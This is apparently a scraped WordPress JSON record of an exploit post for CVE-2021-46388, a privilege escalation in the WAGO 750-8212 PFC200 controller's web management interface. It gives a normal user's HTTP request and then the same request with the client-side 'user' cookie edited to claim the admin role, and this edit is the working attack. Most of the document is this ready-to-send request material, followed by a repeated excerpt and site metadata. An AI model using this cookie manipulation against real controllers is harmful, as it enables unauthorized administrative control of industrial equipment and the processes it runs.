# Exploit Title: WAGO 750-8212 PFC200 G2 2ETH RS Privilege Escalation
\n# Date: 02\/16\/2022
\n# Exploit Author: Momen Eldawakhly (Cyber Guy) at Cypro AB
\n# Vendor Homepage: https:\/\/www.wago.com
\n# Version: Firmware version 03.05.10(17)
\n# Tested on: PopOS! [Linux](Firefox)
\n# CVE : CVE-2021-46388<\/p>\n
========================================
\n= The ordinary user privilege request:
\n========================================<\/p>\n
GET \/wbm\/ HTTP\/1.1
\nHost: 192.168.1.1
\nUser-Agent: Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:96.0) Gecko\/20100101 Firefox\/96.0
\nAccept: *\/*
\nAccept-Language: en-US,en;q=0.5
\nAccept-Encoding: gzip, deflate
\nDNT: 1
\nConnection: close
\nReferer: http:\/\/192.168.1.1\/wbm\/
\nCookie: NG_WBM_SESSION=qru3ocrpde79m5f73526i65uv5; user={%22name%22:%22user%22%2C%22roles%22:[%22user%22%2C%22guest%22]%2C%22hasDefaultPassword%22:true%2C%22csrf%22:%22U2fJfixrfWtLEbVFL6b71oou1yk1WqKTsdFo52yavqrTF86f%22%2C%22timestamp%22:1642368720673%2C%22sessionExists%22:true}<\/p>\n
==========================================
\n= Manipulated Cookie to Admin Privilege:
\n==========================================<\/p>\n
GET \/wbm\/ HTTP\/1.1
\nHost: 192.168.1.1
\nUser-Agent: Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:96.0) Gecko\/20100101 Firefox\/96.0
\nAccept: *\/*
\nAccept-Language: en-US,en;q=0.5
\nAccept-Encoding: gzip, deflate
\nDNT: 1
\nConnection: close
\nReferer: http:\/\/192.168.1.1\/wbm\/
\nCookie: NG_WBM_SESSION=qru3ocrpde79m5f73526i65uv5; user={%22name%22:%22admin%22%2C%22roles%22:[%22admin%22%2C%22admin%22]%2C%22hasDefaultPassword%22:true%2C%22csrf%22:%22U2fJfixrfWtLEbVFL6b71oou1yk1WqKTsdFo52yavqrTF86f%22%2C%22timestamp%22:1642369499829%2C%22sessionExists%22:true}<\/p>\n","protected":false},"excerpt":{"rendered":"
# Exploit Title: WAGO 750-8212 PFC200 G2 2ETH RS Privilege Escalation # Date: 02\/16\/2022 # Exploit Author: Momen Eldawakhly (Cyber Guy) at Cypro AB # Vendor Homepage: https:\/\/www.wago.com # Version: Firmware version 03.05.10(17) # Tested on: PopOS! [Linux](Firefox) # CVE : CVE-2021-46388 ======================================== = The ordinary user privilege request: ======================================== GET \/wbm\/ HTTP\/1.1 Host: 192.168.1.1 …<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-21128","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/21128","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=21128"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/21128\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=21128"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=21128"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=21128"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}